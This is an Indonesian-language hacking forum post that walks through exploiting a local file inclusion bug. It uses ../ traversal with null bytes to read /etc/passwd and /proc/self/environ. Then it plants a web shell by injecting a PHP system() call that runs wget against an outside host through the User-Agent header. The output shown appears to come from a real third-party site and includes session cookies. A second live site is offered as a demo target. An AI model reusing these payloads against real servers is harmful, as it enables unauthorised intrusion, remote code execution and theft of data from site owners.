mumpung ada waktu nulis postingan.
kali ini saya mencoba saya menulis artikel tentang injeksi lfi dengan Add-on yaitu User Agent Switcher 0.7.3
mungkin untuk penjelasan teknik nya sama kayak thread yang bang enda sajikan..
ok download aja dulu add on nya disini
Code: Select all
https://addons.mozilla.org/firefox/downloads/latest/59/addon-59-latest.xpi?src=searchCode: Select all
http://localhost/buglfi.php?file=../etc/passwd%00 (contoh naik 1 directory)Code: Select all
http://localhost/buglfi.php?file=../../etc/passwd%00
http://localhost/buglfi.php?file=../../../etc/passwd%00
http://localhost/buglfi.php?file=../../../../etc/passwd%00 terus naik sampai file /etc/passwd terincludeCode: Select all
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologinCode: Select all
http://localhost/buglfi.php?file=../../../../../etc/passwd%00Code: Select all
http://localhost/buglfi.php?file=../../../../../proc/selv/environ%00Code: Select all
DOCUMENT_ROOT=/home/trafalg/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5HTTP_AUTHORIZATION=HTTP_CONNECTION=keep-aliveHTTP_COOKIE=uname=Linux+host97.hrwebservices.net+2.6.18-274.3.1.el5+%231+SMP+Tue+Sep+6+20%3A13%3A52+EDT+2011+x86_64+x86_64+x86_64+GNU%2F Linux; id=uid%3D32593%28trafalg%29+gid%3D32596%28trafalg%29+groups%3D32596%28trafalg%29 ; sysctl=-; c8dd27a241ad8723ed6693190a9aee42=2b8c6c3b3c130b64aca0649ed2f5f48eHTTP_HOST= trafalgarvillage.orgHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0PATH=/bin:/usr/binQUERY_STRINGjadi pertama harus setting dulu user agen, silahkan lihat gambar di bawah ini
jadi intinya kalo kita memasukkan user agen dengan ikhy conficker, otomatis server akan mengetahui kalau user agen nya ada ikhy conficker
HTTP_USER_AGENT=ikhy conficker
dengan cara seperti itu, maka kita dapat memanipulasinya.
contohnya seperti pada gambar di atas, saya mencoba untuk menganti user agent nya dengan
Code: Select all
<?php system ('wget http://iki.do.am/new.txt -O version.php');?>
NB: http://iki.do.am/new.txt bisa di ganti dengan url injektor sobat sobat atau juga bisa memakai punyanya saya =))apa yang terlihat ?
Code: Select all
DOCUMENT_ROOT=/home/trafalg/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5HTTP_AUTHORIZATION=HTTP_CACHE_CONTROL=max-age=0HTTP_CONNECTION=keep-aliveHTTP_COOKIE=uname=Linux+host97.hrwebservices.net+2.6.18-274.3.1.el5+%231+SMP+Tue+Sep+6+20%3A13%3A52+EDT+2011+x86_64+x86_64+x86_64+GNU%2F Linux; id=uid%3D32593%28trafalg%29+gid%3D32596%28trafalg%29+groups%3D32596%28trafalg%29 ; sysctl=-; visits=0; c8dd27a241ad8723ed6693190a9aee42=ed04777a6f00b9c5a49be8c7a22cb0f5HTTP_HOST= trafalgarvillage.orgHTTP_USER_AGENT=Saving to 'new.txt'... 71.9 KB receivedakewkewek
tinggal kita buka http://localhost/version.php
untuk demonya http://www.visuallab.it//index.php?optio...ontroller=
jadi seperti itulah salah 1 teknik lfi yang sering saya pakai.
jika ada kata yang masih kurang di mengerti sobat. silahkan bertanya
